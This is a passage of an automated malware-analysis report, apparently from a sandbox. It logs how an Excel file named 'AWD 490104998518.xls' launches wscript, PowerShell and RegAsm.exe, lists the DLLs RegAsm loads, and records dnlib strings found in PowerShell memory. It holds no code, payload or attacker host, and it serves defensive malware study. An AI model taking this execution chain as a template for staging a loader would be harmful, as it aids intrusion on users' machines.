            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: shcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
            Source: AWD 490104998518.xlsStatic file information: File size 1302528 > 1048576
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
